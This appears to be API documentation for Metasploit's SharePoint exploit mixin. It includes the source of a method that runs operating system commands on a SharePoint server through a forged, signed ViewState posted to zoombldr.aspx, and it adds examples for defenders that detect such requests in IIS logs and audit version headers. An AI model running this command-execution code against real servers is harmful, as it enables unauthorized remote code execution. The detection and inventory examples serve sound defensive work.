Module: Msf::Exploit::Remote::HTTP::Sharepoint

Includes:
Msf::Exploit::Remote::HttpClient, ViewState
Defined in:
lib/msf/core/exploit/remote/http/sharepoint.rb

Overview

This module provides a way of interacting with SharePoint installations.

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary

Methods included from ViewState

#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Instance Method Details

#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil

Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.

Parameters:

  • cmd (String)

    The OS command to run on the remote system

  • validation_key (String)

    The remote system's validation key from the web.config file.

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (nil)

    This function doesn't return anything.

Raises:

  • (RuntimeError)

    This function will raise a RuntimeError via #fail_with if the command failed to execute.



# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24

def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
  vprint_status("Executing command: #{cmd}")

  res = send_request_cgi(http_request_opts.merge({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
    'vars_post' => {
      '__VIEWSTATE' => generate_viewstate_payload(
        cmd,
        extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
        algo: 'sha256',
        key: pack_viewstate_validation_key(validation_key)
      )
    }
  }))

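  # send_request_cgi returns nil when no response arrives (timeout or connection failure)
  unless res
    fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
  end

  # Any status other than 200 is treated as a failed execution
  unless res.code == 200
    fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
  end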

  vprint_good('Successfully executed command')
end
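
For defenders, the request this method sends has a fixed shape: a POST to /_layouts/15/zoombldr.aspx under whatever base path is configured. The following is an added example, not part of the Metasploit source, that flags such requests in IIS W3C logs; the log excerpt, the field set and the names flag_viewstate_posts and WATCHED_PAGE are constructed for illustration.

```ruby
# Constructed IIS W3C log excerpt (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = <<~LOG
  #Software: Microsoft Internet Information Services 10.0
  #Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
  2024-01-10 09:14:02 GET /_layouts/15/start.aspx - 192.0.2.10 Mozilla/5.0 200
  2024-01-10 09:15:40 POST /_layouts/15/ZoomBldr.aspx - 198.51.100.7 - 200
  2024-01-10 09:15:41 POST /sites/hr/_layouts/15/zoombldr.aspx - 198.51.100.7 - 500
  2024-01-10 09:16:03 GET /_layouts/15/zoombldr.aspx - 192.0.2.10 Mozilla/5.0 200
  2024-01-10 09:17:12 POST /_vti_bin/client.svc/ProcessQuery - 192.0.2.10 Mozilla/5.0 200
LOG

# Path taken from the method above; the name is hypothetical.
WATCHED_PAGE = '/_layouts/15/zoombldr.aspx'

# Returns one hash per POST to the watched page. Column positions come from the
# "#Fields:" directive, so the parser follows whatever field set IIS logged.
def flag_viewstate_posts(log_text, page: WATCHED_PAGE)
  fields = nil
  hits = []
  log_text.each_line do |line|
    line = line.strip
    next if line.empty?

    if line.start_with?('#Fields:')
      fields = line.delete_prefix('#Fields:').split
      next
    end
    next if line.start_with?('#') || fields.nil?

    values = line.split(' ')
    next unless values.length == fields.length # skip truncated or malformed rows

    row = fields.zip(values).to_h
    next unless row['cs-method'] == 'POST'
    # IIS paths are case-insensitive, and the method prepends target_uri.path,
    # so match on the lower-cased suffix rather than the full path.
    next unless row['cs-uri-stem'].to_s.downcase.end_with?(page)

    hits << { time: "#{row['date']} #{row['time']}", client: row['c-ip'],
              path: row['cs-uri-stem'], status: row['sc-status'].to_i }
  end
  hits
end

flag_viewstate_posts(SAMPLE_LOG).each do |hit|
  puts "#{hit[:time]} #{hit[:client]} POST #{hit[:path]} -> #{hit[:status]}"
end
```

A status of 200 on a flagged row is the case the method above reports as success, so those rows deserve review first.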

#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?

Get the site’s webID.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (String, nil)

    The webID if it was able to be recovered.



# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55

def sharepoint_get_site_web_id(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
  }))

  return nil unless res&.code == 200

  res.get_xml_document.at('//d:Id')&.text
end

#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?

Get the SharePoint version number.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (Rex::Version, nil)

    The SharePoint version if it was able to be recovered.

See Also:



# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72

def sharepoint_get_version(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  }))

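  # send_request_cgi returns nil on no response; `res&.headers[...]` would then
  # call [] on nil, because &. guards only the single call that follows it.
  return nil unless res
  return nil unless /^(?<build>[\d.]+)/ =~ res.headers['MicrosoftSharePointTeamServices']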

  Rex::Version.new(build)
end
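
The same header parse is useful for inventory: it shows which hosts disclose their build and which sit below a chosen baseline. The following is an added example, not part of the Metasploit source; the host names, header values, BASELINE_BUILD and the names sharepoint_build and audit are constructed, and Gem::Version stands in for Rex::Version so the block runs outside the framework.

```ruby
require 'rubygems'

# Constructed response-header sets, as an inventory scan might collect them.
SAMPLE_RESPONSES = {
  'sp-a.example.test' => { 'MicrosoftSharePointTeamServices' => '16.0.0.10337' },
  'sp-b.example.test' => { 'microsoftsharepointteamservices' => '16.0.0.4351 trailing-text' },
  'sp-c.example.test' => { 'Server' => 'Microsoft-IIS/10.0' }, # header not exposed
  'sp-d.example.test' => nil # no response
}.freeze

# Placeholder baseline for the example, not a real patch level.
BASELINE_BUILD = Gem::Version.new('16.0.0.10000')

# Applies the regex used by sharepoint_get_version to a plain header hash.
# Returns nil for a missing response, a missing header, or an unparsable value.
def sharepoint_build(headers)
  return nil unless headers

  # HTTP header names are case-insensitive, so do not rely on exact casing.
  _, value = headers.find { |name, _| name.casecmp?('MicrosoftSharePointTeamServices') }
  return nil unless /^(?<build>[\d.]+)/ =~ value

  Gem::Version.new(build)
rescue ArgumentError
  nil # e.g. "16." matches the regex but is not a valid version string
end

# Classifies each host as :ok, :below_baseline or :unknown.
def audit(responses, baseline: BASELINE_BUILD)
  responses.to_h do |host, headers|
    build = sharepoint_build(headers)
    status = if build.nil? then :unknown
             elsif build < baseline then :below_baseline
             else :ok
             end
    [host, { build: build&.to_s, status: status }]
  end
end

audit(SAMPLE_RESPONSES).each do |host, result|
  puts "#{host}: #{result[:build] || 'n/a'} (#{result[:status]})"
end
```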